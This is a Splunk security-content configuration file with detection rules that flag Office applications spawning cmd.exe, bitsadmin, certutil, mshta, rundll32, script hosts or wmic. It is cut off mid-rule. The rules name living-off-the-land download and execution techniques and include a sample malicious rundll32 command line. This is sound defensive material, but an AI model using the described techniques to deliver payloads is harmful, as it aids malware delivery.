action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = A default browser that is not in the exclusion list.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Document Spawned Child Process To Download - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "PlugX", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Office document spawning suspicious child process on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Document Spawned Child Process To Download - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a potentially malicious Office document spawning a living-off-the-land binary (LOLBin) child process to download a payload or other malware. Attackers commonly abuse Office documents to launch built-in Windows utilities because that activity blends into the normal process noise on the infected host and helps cover their tracks.
action.notable.param.rule_title = Office Document Spawned Child Process To Download
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe", "Graph.exe","winproj.exe") Processes.process IN ("*http:*","*https:*") NOT (Processes.original_file_name IN("firefox.exe", "chrome.exe","iexplore.exe","msedge.exe")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_spawned_child_process_to_download_filter`

[ESCU - Office Product Spawn CMD Process - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious Office product process spawning a cmd.exe child process. This is commonly seen when a malicious macro in an MS Office document runs a shell command to download or execute a LOLBin as part of its payload, for example the Trickbot spear-phishing document that used a shell command to run an mshta payload.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious Office product process spawning a cmd.exe child process. This is commonly seen when a malicious macro in an MS Office document runs a shell command to download or execute a LOLBin as part of its payload, for example the Trickbot spear-phishing document that used a shell command to run an mshta payload.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = IT or network administrators may build document automation that runs shell commands.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawn CMD Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Trickbot", "DarkCrystal RAT", "Azorult", "Remcos", "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "Warzone RAT", "PlugX", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = An Office product parent process $parent_process_name$ spawned child process $process_name$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawn CMD Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "DarkCrystal RAT", "Azorult", "Remcos", "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "Warzone RAT", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious Office product process spawning a cmd.exe child process. This is commonly seen when a malicious macro in an MS Office document runs a shell command to download or execute a LOLBin as part of its payload, for example the Trickbot spear-phishing document that used a shell command to run an mshta payload.
action.notable.param.rule_title = Office Product Spawn CMD Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name= "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name= "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name = "msaccess.exe" OR Processes.parent_process_name="Graph.exe" OR Processes.parent_process_name="winproj.exe") `process_cmd` by Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest Processes.original_file_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_product_spawn_cmd_process_filter`

[ESCU - Office Product Spawning BITSAdmin - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `bitsadmin.exe`. In malicious instances, the command line of `bitsadmin.exe` will contain a URL to a remote destination or arguments such as transfer, download, priority and foreground. Threat Research has also released detections identifying suspicious use of `bitsadmin.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `bitsadmin.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `bitsadmin.exe`. In malicious instances, the command line of `bitsadmin.exe` will contain a URL to a remote destination or arguments such as transfer, download, priority and foreground. Threat Research has also released detections identifying suspicious use of `bitsadmin.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `bitsadmin.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = No false positives known. Filter as needed.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning BITSAdmin - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ executed a suspicious child process $process_name$ with process id $process_id$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning BITSAdmin - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `bitsadmin.exe`. In malicious instances, the command line of `bitsadmin.exe` will contain a URL to a remote destination or arguments such as transfer, download, priority and foreground. Threat Research has also released detections identifying suspicious use of `bitsadmin.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `bitsadmin.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.notable.param.rule_title = Office Product Spawning BITSAdmin
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe", "Graph.exe","winproj.exe") `process_bitsadmin` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_bitsadmin_filter`

[ESCU - Office Product Spawning CertUtil - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `certutil.exe`. In malicious instances, the command line of `certutil.exe` will contain a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `certutil.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `certutil.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `certutil.exe`. In malicious instances, the command line of `certutil.exe` will contain a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `certutil.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `certutil.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = No false positives known. Filter as needed.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning CertUtil - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "AgentTesla", "Trickbot", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ executed a suspicious child process $process_name$ with process id $process_id$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning CertUtil - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "AgentTesla", "Trickbot", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `certutil.exe`. In malicious instances, the command line of `certutil.exe` will contain a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `certutil.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `certutil.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.notable.param.rule_title = Office Product Spawning CertUtil
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe", "Graph.exe","winproj.exe") `process_certutil` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_certutil_filter`

[ESCU - Office Product Spawning MSHTA - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `mshta.exe`. In malicious instances, the command line of `mshta.exe` will reference a local `.hta` file or a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `mshta.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `mshta.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `mshta.exe`. In malicious instances, the command line of `mshta.exe` will reference a local `.hta` file or a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `mshta.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `mshta.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = No false positives known. Filter as needed.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning MSHTA - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "IcedID", "Azorult", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ executed a suspicious child process $process_name$ with process id $process_id$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning MSHTA - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "IcedID", "Azorult", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "NjRAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies recent behavior utilized by several malware families and threat actors (including TA551 and IcedID): any Windows Office product spawning `mshta.exe`. In malicious instances, the command line of `mshta.exe` will reference a local `.hta` file or a URL to a remote destination. Threat Research has also released detections identifying suspicious use of `mshta.exe` in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze any artifacts on disk. The Office product or `mshta.exe` will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.notable.param.rule_title = Office Product Spawning MSHTA
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe", "onenote.exe","onenotem.exe", "msaccess.exe","Graph.exe","winproj.exe") `process_mshta` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_mshta_filter`

[ESCU - Office Product Spawning Rundll32 with no DLL - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies recent behavior utilized by the IcedID malware family: any Windows Office product spawning `rundll32.exe` without a `.dll` file extension on its command line. In malicious instances, the command line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. Threat Research has also released a detection identifying the use of `DllRegisterServer` on the `rundll32.exe` command line in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze the DLL that was dropped to disk. The Office product will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies recent behavior utilized by the IcedID malware family: any Windows Office product spawning `rundll32.exe` without a `.dll` file extension on its command line. In malicious instances, the command line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. Threat Research has also released a detection identifying the use of `DllRegisterServer` on the `rundll32.exe` command line in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze the DLL that was dropped to disk. The Office product will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning Rundll32 with no DLL - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ executed a suspicious child process $process_name$ with process id $process_id$ and a command line without a DLL, $process$, on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning Rundll32 with no DLL - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies recent behavior utilized by the IcedID malware family: any Windows Office product spawning `rundll32.exe` without a `.dll` file extension on its command line. In malicious instances, the command line of `rundll32.exe` will look like `rundll32 ..\oepddl.igk2,DllRegisterServer`. Threat Research has also released a detection identifying the use of `DllRegisterServer` on the `rundll32.exe` command line in general; this one narrows the scope to the Office suite as the parent process. During triage, review all file modifications, and capture and analyze the DLL that was dropped to disk. The Office product will have reached out to a remote destination; capture and block the IPs or domains. Review additional parallel processes for further activity.
action.notable.param.rule_title = Office Product Spawning Rundll32 with no DLL
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe", "Graph.exe","winproj.exe") `process_rundll32` (Processes.process!=*.dll*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_rundll32_with_no_dll_filter`

[ESCU - Office Product Spawning Windows Script Host - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a Windows Office product spawning WScript.exe or CScript.exe. Tuning may be required for legitimate applications that spawn scripts from an Office product.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a Windows Office product spawning WScript.exe or CScript.exe. Tuning may be required for legitimate applications that spawn scripts from an Office product.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present from approved macro-based documents in the organization. Filtering may be needed.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning Windows Script Host - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "Remcos", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ executed a suspicious child process $process_name$ on host $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning Windows Script Host - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Remcos", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic will identify a Windows Office Product spawning WScript.exe or CScript.exe. Tuning may be required based on legitimate application usage that may spawn scripts from an Office product.
action.notable.param.rule_title = Office Product Spawning Windows Script Host
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe","Graph.exe","winproj.exe") Processes.process_name IN ("wscript.exe","cscript.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_product_spawning_windows_script_host_filter`

[ESCU - Office Product Spawning Wmic - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies the latest behavior utilized by the Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product or `wmic.exe` will have reached out to a remote destination; capture and block the IPs or domain. Review additional parallel processes for further activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
